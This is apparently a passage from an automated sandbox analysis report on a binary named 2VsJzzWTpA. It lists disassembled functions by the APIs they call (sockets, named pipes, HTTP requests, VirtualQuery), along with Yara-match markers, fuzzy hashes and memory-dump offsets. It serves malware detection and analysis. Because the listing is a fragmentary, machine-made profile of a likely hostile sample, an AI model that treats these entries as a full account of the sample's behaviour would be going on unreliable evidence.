                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                • String ID: %s%s$*/*
                • API String ID: 3787158362-856325523
                • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                • Instruction ID: 4feb4164774b2fa1ebca02c0a566f91f923d055f021e5dab81b1decc33edf96a
                • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                • Instruction Fuzzy Hash: DC711236300B859AEB50DF65E8903ED37A2FB88788F504126EA4D13B68DF3EC51AC710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                • String ID:
                • API String ID: 34948862-0
                • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                • Instruction ID: 6e884b6e5ffd85282d21a74658fbec779b271abfe7c071b39529fe0f93f4ef17
                • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                • Instruction Fuzzy Hash: B541AB32704F01D6EB00DB61E8647AD336BE388BA4F908225DE2F47BA4DF79C4668740
                APIs
                • _errno.LIBCMT ref: 0067FE36
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • _invalid_parameter_noinfo.LIBCMT ref: 0067FE42
                • __crtIsPackagedApp.LIBCMT ref: 0067FE53
                • AreFileApisANSI.KERNEL32 ref: 0067FE62
                • MultiByteToWideChar.KERNEL32 ref: 0067FE88
                • GetLastError.KERNEL32 ref: 0067FE95
                • _dosmaperr.LIBCMT ref: 0067FE9D
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1138158220-0
                • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                • Instruction ID: cf4228a557fd0e6063c7d3efb5bddca3d5e4dcbb782ebe834ceeb27299a869a2
                • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                • Instruction Fuzzy Hash: 2121C132300B4192EB50AF76E81472D77E7AB89FA4F148638EE4947BA6EF3CC5118705
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                • String ID:
                • API String ID: 4099253644-0
                • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                • Instruction ID: f1ad4a06997b4ec404ae2e7d0c08ef39ca67135b9a45530cf5c6cb660311c64c
                • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                • Instruction Fuzzy Hash: 81316D25301A4085FE44FF51E8607B423A3BB46B90F084629DD5E177A2DF7EC964CB06
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                • String ID: d
                • API String ID: 1257931466-2564639436
                • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                • Instruction ID: e4ac90b84feb32bba891d0a522a0d5fa65501591bdec2923f5d6bc6cc3296ff1
                • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                • Instruction Fuzzy Hash: 90319C32214B81D6DB20CF62F88479A77A6F788B98F005126EE8D47F28DF79C565CB40
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: write_multi_char$write_string$free
                • String ID:
                • API String ID: 2630409672-3916222277
                • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                • Instruction ID: 93fad225b0fb5ed7e81c76d3e0d515d3c62d7566275eba2a4f6cc3feda05745d
                • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                • Instruction Fuzzy Hash: 1591133374878496EB25CB65E404BAE7B70F7A6794F24100EEF8A57B99DB38C945CB00
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$ErrorLastSleepselectsend
                • String ID: d
                • API String ID: 2152284305-2564639436
                • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                • Instruction ID: efd5a79e5ba5b1a49d4fa8f9e830f0533f845b3e87a0d99194b745c716581666
                • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                • Instruction Fuzzy Hash: 9E219032218A8196D7609F21F88838E7366F784784F504225EBAD47F59DF39C5A4CB44
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                • String ID:
                • API String ID: 3101085627-0
                • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                • Instruction ID: 20c444c17b0549a3d1c7f0f45b5fa1bf5f6f455f3e7158127a932f33e358a413
                • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                • Instruction Fuzzy Hash: A7318E32700A45AAEB10DFB9E49439D3377F784B98F514126EE0E97A29DF39C549C780
                APIs
                • _errno.LIBCMT ref: 001C624E
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C6245
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __doserrno.LIBCMT ref: 001C62AB
                • _errno.LIBCMT ref: 001C62B2
                • _invalid_parameter_noinfo.LIBCMT ref: 001C6316
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                • Instruction ID: 38d4aac9496663a0b74bc99d89ee2c492c4ed760ec678c284055fd81f10a89bb
                • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                • Instruction Fuzzy Hash: B8210632710394D6C7066FB59C92F2D3620BBB2BA0F95922DEE2517793CB78C892C710
                APIs
                • _errno.LIBCMT ref: 00686E4E
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00686E45
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __doserrno.LIBCMT ref: 00686EAB
                • _errno.LIBCMT ref: 00686EB2
                • _invalid_parameter_noinfo.LIBCMT ref: 00686F16
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                • Instruction ID: 7cfaa5dcb511f5f5a62132100b7c36c6074cf6fcc5c00208eaf73f742b1eeb31
                • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                • Instruction Fuzzy Hash: AE21F17231035086C757BF76E89132D3657AB82BA0F958329FE212B792CB7CC8428715
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 001CF176
                • _errno.LIBCMT ref: 001CF16B
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1812809483-0
                • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                • Instruction ID: 07de931665cf7b0ae0fbed8da54a5f8435d64601eeafdbe7b98d6462026b7dde
                • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                • Instruction Fuzzy Hash: 0341447A610395C2DF24AB62C401BAD72A2E775BE4FA8423EEB9443B85D738C943C700
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 0068FD76
                • _errno.LIBCMT ref: 0068FD6B
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1812809483-0
                • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                • Instruction ID: 4d6e19287958bf355a1f7852a4977f97c7be83c3748a9460f70b2f05641afc63
                • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                • Instruction Fuzzy Hash: 0841477261039186DF20FB2294442FD77A3EB65BE4FA44336EB9447BA6D739C8928700
                APIs
                  • Part of subcall function 00680264: _mtinitlocknum.LIBCMT ref: 00683DAA
                  • Part of subcall function 00680264: _amsg_exit.LIBCMT ref: 00683DB6
                • DecodePointer.KERNEL32 ref: 006802D8
                • DecodePointer.KERNEL32 ref: 006802F6
                • EncodePointer.KERNEL32 ref: 00680324
                • DecodePointer.KERNEL32 ref: 00680339
                • EncodePointer.KERNEL32 ref: 00680344
                • DecodePointer.KERNEL32 ref: 00680356
                • DecodePointer.KERNEL32 ref: 00680366
                • __crtCorExitProcess.LIBCMT ref: 006803EA
                • ExitProcess.KERNEL32 ref: 006803F2
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                • String ID:
                • API String ID: 1550138920-0
                • Opcode ID: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                • Instruction ID: 9df82419cd52bf638c99b27bdb88a8babd163be2b3f9864eb32f8bca7f94e206
                • Opcode Fuzzy Hash: c0449f3fef6a4d8576451ebf1d27e0541d416188840e9d96df55a1b66d98fc2d
                • Instruction Fuzzy Hash: D7418031216B5297F690AF11FC5431973A7F788BD4F440629E98E93B24DF39C5A98700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                • String ID:
                • API String ID: 3339321253-0
                • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                • Instruction ID: b1788b8707f78e1acc7366027eacb695295fd0740c809ae3d58e72257b77e0e2
                • Opcode Fuzzy Hash: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
                • Instruction Fuzzy Hash: 97316922314A91A2EB24DF21E8647AE6367F744BA8F544134EE0E47B98EF3DC659C740
                APIs
                  • Part of subcall function 00676BE0: htonl.WS2_32 ref: 00676C3D
                  • Part of subcall function 00676BE0: select.WS2_32 ref: 00676CAB
                  • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676CC3
                  • Part of subcall function 00676BE0: accept.WS2_32 ref: 00676CE0
                  • Part of subcall function 00676BE0: ioctlsocket.WS2_32 ref: 00676CF8
                  • Part of subcall function 00676BE0: __WSAFDIsSet.WS2_32 ref: 00676D9B
                • GetTickCount.KERNEL32 ref: 00676BAA
                  • Part of subcall function 00676F2C: malloc.LIBCMT ref: 00676F5E
                  • Part of subcall function 00676F2C: htonl.WS2_32 ref: 00676F91
                  • Part of subcall function 00676F2C: recvfrom.WS2_32 ref: 00676FD5
                  • Part of subcall function 00676F2C: WSAGetLastError.WS2_32 ref: 00676FE2
                • GetTickCount.KERNEL32 ref: 00676BC2
                • GetTickCount.KERNEL32 ref: 006770E0
                • GetTickCount.KERNEL32 ref: 006770F6
                • shutdown.WS2_32 ref: 00677115
                • shutdown.WS2_32 ref: 0067712A
                • closesocket.WS2_32 ref: 00677134
                • free.LIBCMT ref: 00677154
                • free.LIBCMT ref: 00677169
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                • String ID:
                • API String ID: 3610715900-0
                • Opcode ID: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                • Instruction ID: d8f480d3902b15dbd3bfb10997250aad907e18a79d7c5dc3265a71454a942d6c
                • Opcode Fuzzy Hash: 1c403b153f4cdb51b3aa82c7904d7a2a385d985f1a2ac89a95e712731fd71160
                • Instruction Fuzzy Hash: F2218D72204A42C2DB209F72E85436923A7F748F88F18C225DE4D87725DF75C9A1CB56
                APIs
                • _errno.LIBCMT ref: 001C7033
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C702B
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C7077
                • _lseeki64_nolock.LIBCMT ref: 001C7090
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                • String ID:
                • API String ID: 4140391395-0
                • Opcode ID: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                • Instruction ID: 058669ddc30177cea810e3a2b2250b9773ba6fff2ecb30b693514bc95a488f4f
                • Opcode Fuzzy Hash: 19101616f3e261a9beafbca214444aa2a5cb8e231afb96d714edbab2d78f6c11
                • Instruction Fuzzy Hash: 8711022270428055EB052F659802B7DBA11A7B2BB1F19471CBE350B7D2CBBCC8A1CB21
                APIs
                • _errno.LIBCMT ref: 001C6EBB
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C6EB3
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C6EFF
                • _lseek_nolock.LIBCMT ref: 001C6F18
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                • String ID:
                • API String ID: 310312816-0
                • Opcode ID: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                • Instruction ID: bfdf8927219a1c0db9bc5fb0f70ec63aa55916b6475b4c1005a446d7f9587be5
                • Opcode Fuzzy Hash: 58556fb0ae643294109593e6a1f551c1d1756168c239dbf47c2b40feda9217b5
                • Instruction Fuzzy Hash: 0D11033270068055D7066F65E862B7D6A61BBB1BA1F5A422DBA150B3D2CB7CC891C724
                APIs
                • _errno.LIBCMT ref: 00687ABB
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00687AB3
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 00687AFF
                • _lseek_nolock.LIBCMT ref: 00687B18
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                • String ID:
                • API String ID: 310312816-0
                • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                • Instruction ID: 24f0610d08a0e9dc992270e57341d53098f47f79d343df18f8d8b644598904b5
                • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                • Instruction Fuzzy Hash: 2411783270824046E7167F65E89136DB663BB817A1F29431DEE251B3D1CB7CC882D719
                APIs
                • _errno.LIBCMT ref: 00687C33
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00687C2B
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 00687C77
                • _lseeki64_nolock.LIBCMT ref: 00687C90
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                • String ID:
                • API String ID: 4140391395-0
                • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                • Instruction ID: 5dc25f8dcf996d4c8157047387c0dd1f90f798925ef1df76545ee2abbc0fabdd
                • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                • Instruction Fuzzy Hash: 451156327086404AEB567F26E85136D7A53AB81BB1F294718FE391B3D2CB3CC442C729
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno
                • String ID:
                • API String ID: 2288870239-0
                • Opcode ID: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                • Instruction ID: ddea1815f7091b6444c24c87483e48f1ed0a7c78e2103579739e950a14cedbcc
                • Opcode Fuzzy Hash: 819b4a270ea7d8595eaf9ac501f5b396dc923916a4c2f054388fd72371d1b91d
                • Instruction Fuzzy Hash: 5831F635601A8185FE18EF55ECA53EC23A1BBA8BA0F5C0239DD1E0B6A1DF2CC446C351
                APIs
                Strings
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                • Address %p has no image-section, xrefs: 00401DC0
                • Mingw-w64 runtime failure:, xrefs: 00401D88
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 1804819252-1534286854
                • Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                • Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
                • Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
                • Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348
                APIs
                • _errno.LIBCMT ref: 001C585F
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C5857
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C58A3
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                • String ID:
                • API String ID: 2611593033-0
                • Opcode ID: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                • Instruction ID: 634e98f625f9fa467a82c9908df3940d2cda5850be515b119fa48cb2f3079672
                • Opcode Fuzzy Hash: 268773e762f2e10da4a59bd6545c27f05d9dc8848c407f150f864121acff7d22
                • Instruction Fuzzy Hash: 56113632B00A8096D7052F66EC42B7D7A22B7B1BA1F5A421DAA150B3D2CB7CD881D720
                APIs
                • _errno.LIBCMT ref: 0068645F
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00686457
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 006864A3
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                • String ID:
                • API String ID: 2611593033-0
                • Opcode ID: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                • Instruction ID: c3f53764061b736138cf567853190568bf4f5ca1a6f594924a029798c2a7fa8e
                • Opcode Fuzzy Hash: 1700ff755fa86426cee97dc6493a8bbd2f86863ab499d60c3e97554295ddf05f
                • Instruction Fuzzy Hash: 7011563270024046E756BF65E85132D7A93AB81BB1F59831DFE251B3D2CB7CC842C729
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                • String ID:
                • API String ID: 2289611984-0
                • Opcode ID: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                • Instruction ID: 0d8c8305014683f044f82c85f488e99059061193ed71ff6f56693760bce6f3a0
                • Opcode Fuzzy Hash: c8931cb6991e1dcdb4b4beaef908be2012675e49725fd5fc40ebfddcb96b8d14
                • Instruction Fuzzy Hash: D811383530064185F716BFE5A8A036D7667AB81B60F19432EDF160B391CB78C882A35A
                APIs
                • _errno.LIBCMT ref: 001C5079
                  • Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C
                • __doserrno.LIBCMT ref: 001C5071
                  • Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC
                • __lock_fhandle.LIBCMT ref: 001C50BD
                • _close_nolock.LIBCMT ref: 001C50D0
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                • String ID:
                • API String ID: 4060740672-0
                • Opcode ID: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                • Instruction ID: 3e54719696332346c6774f72743f91e7305863619329b9cc4123aa14db80aef9
                • Opcode Fuzzy Hash: 17379182c61e94fbc4142119cfcf5b3e3f43e3e6c30bf76299a690df2e0bdcd6
                • Instruction Fuzzy Hash: E4113632700A8495D3056F75EC86B6C7A12B7B17A1F6E462CFA1A473D3C7B8C8D18750
                APIs
                • _errno.LIBCMT ref: 00685C79
                  • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                • __doserrno.LIBCMT ref: 00685C71
                  • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                • __lock_fhandle.LIBCMT ref: 00685CBD
                • _close_nolock.LIBCMT ref: 00685CD0
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                • String ID:
                • API String ID: 4060740672-0
                • Opcode ID: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                • Instruction ID: 14533b4ae420227cbd097e30d8214636af86d3ccf5c4f633f6a5fb2d41b8138a
                • Opcode Fuzzy Hash: 8f1e5b792f872c4dc36995a7bc6d01a3aafca90ffb12f932fc30e24f319e98c6
                • Instruction Fuzzy Hash: 91112932700B8046E756BF65EC9532C7A53AF81761F69472DEE1B4B3D2C7B8C8428B19
                APIs
                • malloc.LIBCMT ref: 001A3AA9
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
